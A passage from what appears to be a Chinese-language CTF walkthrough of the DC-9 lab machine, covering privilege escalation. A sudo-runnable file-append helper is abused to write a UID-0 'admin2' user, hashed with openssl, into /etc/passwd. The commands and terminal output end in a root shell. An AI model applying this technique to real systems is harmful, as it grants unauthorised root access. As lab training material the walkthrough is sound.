-rwxr-xr-x 1 root root 153904 Apr 3 2019 _codecs_cn.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 158032 Apr 3 2019 _codecs_hk.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 31024 Apr 3 2019 _codecs_iso2022.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 272688 Apr 3 2019 _codecs_jp.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 141616 Apr 3 2019 _codecs_kr.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 112944 Apr 3 2019 _codecs_tw.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 34008 Apr 3 2019 _hashlib.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 74688 Jul 11 2019 libbz2.so.1.0
-rwxr-xr-x 1 root root 3031904 Oct 13 2019 libcrypto.so.1.1
-rwxr-xr-x 1 root root 243840 Sep 20 2019 libexpat.so.1
-rwxr-xr-x 1 root root 158400 Jan 28 2019 liblzma.so.5
-rwxr-xr-x 1 root root 5080176 Apr 3 2019 libpython3.7m.so.1.0
-rwxr-xr-x 1 root root 309096 May 6 2018 libreadline.so.7
-rwxr-xr-x 1 root root 593696 Oct 13 2019 libssl.so.1.1
-rwxr-xr-x 1 root root 183528 Aug 6 2019 libtinfo.so.6
-rwxr-xr-x 1 root root 121280 Sep 26 2017 libz.so.1
-rwxr-xr-x 1 root root 37688 Apr 3 2019 _lzma.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 64792 Apr 3 2019 _multibytecodec.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 14632 Apr 3 2019 _opcode.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 39944 Apr 3 2019 readline.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 19752 Apr 3 2019 resource.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 116568 Apr 3 2019 _ssl.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 29064 Apr 3 2019 termios.cpython-37m-x86_64-linux-gnu.so
-rwxr-xr-x 1 root root 1212968 Dec 29 2019 test
准备提权
回退到前面目录发现python脚本
fredf@dc-9:/opt/devstuff/dist/test$ cd ..
fredf@dc-9:/opt/devstuff/dist$ ls
test
fredf@dc-9:/opt/devstuff/dist$ ls -al
total 12
drwxr-xr-x 3 root root 4096 Dec 29 2019 .
drwxr-xr-x 5 root root 4096 Dec 29 2019 ..
drwxr-xr-x 2 root root 4096 Dec 29 2019 test
fredf@dc-9:/opt/devstuff/dist$ cd ..
fredf@dc-9:/opt/devstuff$ ls
build dist __pycache__ test.py test.spec
fredf@dc-9:/opt/devstuff$
查看一下内容,生成一个密码用root权限执行脚本写入/etc/passwd文件,所以我们现在就需要构造一个拥有root权限的用户,并且在/etc/passwd文件中储存,只要使用这个用户登录后,就可以获取到root权限
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
print ("Usage: python test.py read append")
sys.exit (1)
else :
f = open(sys.argv[1], "r")
output = (f.read())
f = open(sys.argv[2], "a")
f.write(output)
f.close()
回到kali,使用openssl工具创建一个本地的加密用户,命令openssl passwd -1 -salt admin admin
回到靶机
然后回到靶机,跳转到/opt/devstuff/dist/test目录
使用echo命令在/tmp目录下创建一个文件,命令
echo 'admin:$1$admin$1kgWpnZpUx.vTroWPXPIB0:0:0::/root:/bin/bash' >> /tmp/test1
然后使用命令
sudo ./test /tmp/test1 /etc/passwd
使用sudo命令执行test文件将/tmp/test1的内容写入到/etc/passwd文件中
我这里试了好几次,不知道什么原因,最后admin2成功了,有师傅懂的欢迎交流
┌──(root㉿kali)-[~]
└─# ssh fredf@192.168.100.22
fredf@192.168.100.22's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb 1 13:28:27 2024 from 192.168.100.251
fredf@dc-9:~$ cd /opt/devstuff/dist/test
fredf@dc-9:/opt/devstuff/dist/test$ ls
base_library.zip libpython3.7m.so.1.0
_bz2.cpython-37m-x86_64-linux-gnu.so libreadline.so.7
_codecs_cn.cpython-37m-x86_64-linux-gnu.so libssl.so.1.1
_codecs_hk.cpython-37m-x86_64-linux-gnu.so libtinfo.so.6
_codecs_iso2022.cpython-37m-x86_64-linux-gnu.so libz.so.1
_codecs_jp.cpython-37m-x86_64-linux-gnu.so _lzma.cpython-37m-x86_64-linux-gnu.so
_codecs_kr.cpython-37m-x86_64-linux-gnu.so _multibytecodec.cpython-37m-x86_64-linux-gnu.so
_codecs_tw.cpython-37m-x86_64-linux-gnu.so _opcode.cpython-37m-x86_64-linux-gnu.so
_hashlib.cpython-37m-x86_64-linux-gnu.so readline.cpython-37m-x86_64-linux-gnu.so
libbz2.so.1.0 resource.cpython-37m-x86_64-linux-gnu.so
libcrypto.so.1.1 _ssl.cpython-37m-x86_64-linux-gnu.so
libexpat.so.1 termios.cpython-37m-x86_64-linux-gnu.so
liblzma.so.5 test
fredf@dc-9:/opt/devstuff/dist/test$ echo 'admin2:$1$admin2$Pr1254RlLuWxoieYEI.Sa0:0:0::/root:/bin/bash' >> /tmp/test1
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/test1 /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su admin2
Password:
root@dc-9:/opt/devstuff/dist/test#
成功!flag就在root目录下